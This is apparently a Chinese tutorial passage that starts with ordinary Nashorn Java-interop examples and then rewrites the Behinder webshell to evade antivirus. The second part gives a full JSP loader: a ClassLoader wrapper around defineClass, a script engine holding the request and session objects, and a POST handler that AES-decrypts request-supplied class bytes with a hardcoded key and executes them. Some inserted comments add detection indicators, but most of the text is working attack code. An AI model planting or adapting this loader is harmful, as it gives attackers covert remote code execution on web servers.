// Compatibility shim: loads the Rhino-style helpers (importPackage, JavaImporter, ...)
// into Nashorn, then imports java.util so ArrayList can be used unqualified.
load("nashorn:mozilla_compat.js");
importPackage(java.util);
var list = new ArrayList();
JavaImporter:主要针对类型冲突的情况,配合with限定作用域
// JavaImporter bundles several packages into one scope object; names from those
// packages resolve only inside the with(...) block, so the global scope stays clean
// and type-name conflicts between packages are confined to this block.
var SwingGui = new JavaImporter(javax.swing, javax.swing.event, javax.swing.border, java.awt.event);
with (SwingGui) {
    // Swing classes are reachable only inside this with block, which keeps them
    // from polluting the global namespace.
    var mybutton = new JButton("test");
    var myframe = new JFrame("test");
}
// Java.type returns a Nashorn handle for a Java class; static members are then
// reachable through it. The four calls below show the different ways a Java
// method can be invoked from script, including explicit overload selection.
var System = Java.type('java.lang.System');
System.out.println('Hello, World');             // Hello, World
System.out['println']('Hello, World');          // Hello, World — member selected by name string
System.out['println(int)'](3.14);               // 3 — overload chosen explicitly; the double is converted to int
System.out['println(double)'](3.14);            // 3.14
改写冰蝎免杀shell
预处理绑定对象
根据冰蝎的一句话shell,在java代码的部分,我们需要预处理绑定一些对象
<%@ page import="javax.script.*" %>
<%!
// ClassLoader subclass whose only purpose is to expose the protected
// defineClass(), so that bytecode received at runtime can be turned into a class.
// Detection note: a JSP that declares a ClassLoader subclass wrapping defineClass()
// and hands it to a script engine has no legitimate page-rendering use; this
// pattern is a high-fidelity indicator of a Behinder-style webshell loader.
class U extends ClassLoader {
    U(ClassLoader c) { super(c); }
    public Class g(byte[] b) { return super.defineClass(b, 0, b.length); }
}
%>
<%
// Nashorn engine. The servlet objects are bound as script globals so the
// evaluated script can read the request body and reach the page context.
ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
engine.put("request", request);
engine.put("response", response);
engine.put("session", session);
engine.put("pageContext", pageContext);
// The loader is bound as a script global as well; the article explains below
// why a separate U object is still needed.
engine.put("U", new U(this.getClass().getClassLoader()));
// "xxx" stands for the script body shown later in the article.
engine.eval("xxx");
%>
// Turns raw class bytes into a loaded class via U.g(), which is reached through
// reflection, then instantiates it and calls its equals() with pageContext as the
// argument. What the instance does with pageContext is decided by the loaded
// bytecode, which is not shown on this page.
// Detection note: getDeclaredMethod("g", byte[].class) followed by
// setAccessible(true) inside a script engine is the exact point where
// request-supplied bytecode begins executing; logging or blocking reflective
// access to defineClass wrappers from script engines breaks this loader.
function define(classBytes) {
    var defineClassMethod = U.getClass().getDeclaredMethod("g", classBytes.getClass());
    defineClassMethod.setAccessible(true);
    var cc = defineClassMethod.invoke(U, new Array(classBytes));
    cc.newInstance().equals(pageContext);
}
照搬一下剩下的部分(改为js的语法即可)
// Request handler: only POST requests are processed.
if (request.getMethod().equals("POST")) {
    // Fixed 16-byte AES key, also stored in the session under attribute "u".
    // Detection note: this literal key and the session attribute "u" being set on
    // every POST are static indicators that signature-based rules can match.
    var k = new java.lang.String("e45e329feb5d925b");
    session.putValue("u", k);
    // "AES" without an explicit mode/padding resolves to the JDK default
    // transformation AES/ECB/PKCS5Padding.
    var c = Cipher.getInstance("AES");
    c.init(2, new SecretKeySpec(k.getBytes(), "AES")); // 2 == Cipher.DECRYPT_MODE
    // The first line of the request body is Base64-decoded, AES-decrypted and passed
    // to define() as class bytes. sun.misc.BASE64Decoder is an internal API that was
    // removed in JDK 9, so this only works on JDK 8.
    define(c.doFinal(new BASE64Decoder().decodeBuffer(request.getReader().readLine())));
}
// Complete script body that the JSP's engine.eval() runs in place of "xxx".
// A failed load of the compatibility shim is silently ignored, even though the
// importPackage calls that follow depend on it.
try { load("nashorn:mozilla_compat.js"); } catch (e) {}
importPackage(Packages.java.util);
importPackage(Packages.java.lang);
importPackage(Packages.javax.crypto);
importPackage(Packages.sun.misc);          // provides BASE64Decoder; internal API, JDK 8 only
importPackage(Packages.javax.crypto.spec);

// Loads class bytes through the U.g() wrapper (reached via reflection),
// instantiates the class and calls equals() with pageContext; what happens next
// is up to the loaded bytecode, which is not shown here.
// Detection note: reflective access to a defineClass wrapper from inside a
// script engine is the high-fidelity indicator for this loader.
function define(classBytes) {
    var defineClassMethod = U.getClass().getDeclaredMethod("g", classBytes.getClass());
    defineClassMethod.setAccessible(true);
    var cc = defineClassMethod.invoke(U, new Array(classBytes));
    cc.newInstance().equals(pageContext);
}

// Only POST requests are processed.
if (request.getMethod().equals("POST")) {
    // Fixed 16-byte AES key, stored in the session under "u"; both the literal key
    // and the session attribute are static indicators for detection rules.
    var k = new java.lang.String("e45e329feb5d925b");
    session.putValue("u", k);
    // "AES" alone resolves to the JDK default AES/ECB/PKCS5Padding.
    var c = Cipher.getInstance("AES");
    c.init(2, new SecretKeySpec(k.getBytes(), "AES")); // 2 == Cipher.DECRYPT_MODE
    // First body line: Base64-decode, AES-decrypt, hand to define() as class bytes.
    define(c.doFinal(new BASE64Decoder().decodeBuffer(request.getReader().readLine())));
}